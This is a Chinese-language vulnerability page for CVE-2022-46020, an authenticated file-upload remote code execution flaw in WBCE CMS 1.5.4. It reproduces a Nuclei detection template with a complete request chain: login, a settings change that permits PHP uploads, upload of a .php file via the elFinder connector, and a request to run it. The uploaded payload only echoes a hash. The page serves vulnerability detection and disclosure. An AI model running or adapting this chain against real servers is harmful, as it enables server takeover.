WBCE CMS v154 - Remote Code Execution

漏洞信息

漏洞名称: WBCE CMS v1.5.4 - Remote Code Execution

漏洞编号:

  • CVE: CVE-2022-46020

漏洞类型: 文件上传

漏洞等级: 严重

漏洞描述: WBCE CMS是一个开源的内容管理系统,广泛用于构建和管理网站。它提供了用户友好的界面和多种功能,如页面管理、媒体库和模板编辑等,适用于各种规模的网站部署。该系统的v1.5.4版本存在一个严重的远程代码执行漏洞。

漏洞的根源在于WBCE CMS v1.5.4在处理文件上传时,未能正确验证上传文件的类型,导致攻击者可以通过修改上传文件类型来绕过安全限制,上传恶意PHP文件。这种漏洞属于文件上传漏洞,具体表现为服务端对客户端提交的文件类型检查不严格,使得攻击者能够上传并执行任意代码。

成功利用此漏洞的攻击者可以在受影响的系统上执行任意代码,完全控制服务器,进而可能导致数据泄露、服务中断或其他恶意活动。此漏洞的利用需要攻击者具有有效的用户凭证,即需要认证后才能进行攻击。由于漏洞的严重性和易用性,它被评定为严重级别。建议用户立即升级到WBCE CMS v1.5.5或更高版本以修复此漏洞。

产品厂商: wbce

产品名称: wbce_cms

影响版本: 1.5.4

来源: https://github.com/projectdiscovery/nuclei-templates/blob/953302e619aede40dca8ce943aa33a853d2d388f/http%2Fcves%2F2022%2FCVE-2022-46020.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139

id: CVE-2022-46020

info:
name: WBCE CMS v1.5.4 - Remote Code Execution
author: theamanrawat
severity: critical
description: |
WBCE CMS v1.5.4 can implement getshell by modifying the upload file type.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Upgrade to a patched version of WBCE CMS v1.5.5 or later to mitigate this vulnerability.
reference:
- https://github.com/WBCE/WBCE_CMS
- https://github.com/10vexh/Vulnerability/blob/main/WBCE%20CMS%20v1.5.4%20getshell.pdf
- https://nvd.nist.gov/vuln/detail/CVE-2022-46020
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-46020
cwe-id: CWE-434
epss-score: 0.84584
epss-percentile: 0.99281
cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 6
vendor: wbce
product: wbce_cms
tags: cve,cve2022,rce,wbce,cms,authenticated,intrusive

http:
- raw:
- |
GET /admin/login/index.php HTTP/1.1
Host: {{Hostname}}
- |
POST /admin/login/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login
- |
GET /admin/settings/index.php?advanced=yes HTTP/1.1
Host: {{Hostname}}
- |
POST /admin/settings/save.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

advanced=yes&formtoken={{formtoken}}&website_title=test&website_description=&website_keywords=&website_header=&website_footer=&page_level_limit=4&page_trash=inline&page_languages=false&multiple_menus=true&home_folders=true&manage_sections=true&section_blocks=true&intro_page=false&homepage_redirection=false&smart_login=true&frontend_login=false&redirect_timer=1500&frontend_signup=false&er_level=E0&wysiwyg_editor=ckeditor&default_language=EN&default_charset=utf-8&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&search_footer=&search_max_excerpt=15&search_time_limit=0&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&pages_directory=%2Fpages&media_directory=%2Fmedia&page_extension=.php&rename_files_on_upload=
- |
POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------213974337328367932543216511988

-----------------------------213974337328367932543216511988
Content-Disposition: form-data; name="reqid"

test
-----------------------------213974337328367932543216511988
Content-Disposition: form-data; name="cmd"

upload
-----------------------------213974337328367932543216511988
Content-Disposition: form-data; name="target"

l1_Lw
-----------------------------213974337328367932543216511988
Content-Disposition: form-data; name="upload[]"; filename="{{randstr}}.php"
Content-Type: application/x-php

<?php

echo md5("CVE-2022-46020");

?>

-----------------------------213974337328367932543216511988
Content-Disposition: form-data; name="mtime[]"

1
-----------------------------213974337328367932543216511988--
- |
GET /media/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}

matchers-condition: and
matchers:
- type: word
part: body_6
words:
- 751a8ba516522786d551075a092a7a84

- type: word
part: header
words:
- text/html

- type: status
status:
- 200

extractors:
- type: regex
name: username_fieldname
group: 1
regex:
- name="username_fieldname" value="(.*)"
internal: true
part: body

- type: regex
name: password_fieldname
group: 1
regex:
- name="password_fieldname" value="(.*)"
internal: true
part: body

- type: regex
name: formtoken
group: 1
regex:
- name="formtoken" value="(.*)"
internal: true
part: body

- type: regex
name: app_name
group: 1
regex:
- name="app_name" value="(.*)"
internal: true
part: body
# digest: 490a0046304402202cafd7b2682bf62fdc96184ddff7f859943f7048e72e0cb957494b240f4719e202203a6d244eccd30c56f3e79c3245d8c38dabb49d00387d2b25ebce82227a721fb0:922c64590222798bb761d5b6d8e72950



WBCE CMS v154 - Remote Code Execution
http://example.com/2025/07/04/github_3521696569/
作者
lianccc
发布于
2025年7月4日
许可协议